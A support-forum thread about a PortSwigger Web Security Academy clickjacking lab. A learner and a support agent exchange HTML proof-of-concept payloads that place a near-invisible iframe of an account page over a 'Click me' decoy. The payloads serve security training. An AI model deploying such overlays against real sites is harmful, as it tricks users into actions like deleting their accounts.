Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Basic clickjacking with CSRF token protection HELP

Pompom | Last updated: Jul 30, 2024 10:30PM UTC

I'm trying to solve this lab but on the target website it directs to the login page instead of the account page with the delete button. How do I make my code redirect to the account page instead of the log in page? I've already logged into the account on the real page using burp's browser and copied the URL. Thank you <style> iframe { position:relative; width:1000px; height: 700px; opacity: 0.1; z-index: 2; } div { position:absolute; top:600px; left:60px; z-index: 1; } </style> <div>Click ME</div> <iframe src="https://0a2d00ca048872a08cdf606900550003.web-security-academy.net/my-account"></iframe>

akibaRubi | Last updated: Jul 31, 2024 06:19AM UTC

I'm having the same challenge. I have done a screen recording and sent across. Waiting for further responses

Michelle, PortSwigger Agent | Last updated: Jul 31, 2024 01:17PM UTC

Hi both Have you tried using normal Chrome as an external browser proxied via Burp? If so, did this help? If it doesn't help, can you please let us know which version of Chrome you are using?

akibaRubi | Last updated: Jul 31, 2024 03:53PM UTC

Version 127.0.6533.89 (Official Build) (64-bit) Google Chrome Copyright 2024 Google LLC. All rights reserved. Chrome is made possible by the Chromium open source project and other open source software. Terms of Service

Michelle, PortSwigger Agent | Last updated: Aug 01, 2024 02:08PM UTC

Hi Thanks for confirming those details. I can see my colleague has replied to your email and she was able to solve the lab using normal Chrome and the following exploit: <style> iframe { position:relative; width:500px; height: 700px; opacity: 0.0001; z-index: 2; } div { position:absolute; top:500px; left:60px; z-index: 1; } </style> <div>Click me</div> <iframe src="YOUR-LAB-ID.web-security-academy.net/my-account"></iframe> I hope this helps.

akibaRubi | Last updated: Aug 03, 2024 11:48AM UTC

okay, lab solved. Thanks

Michelle, PortSwigger Agent | Last updated: Aug 05, 2024 07:56AM UTC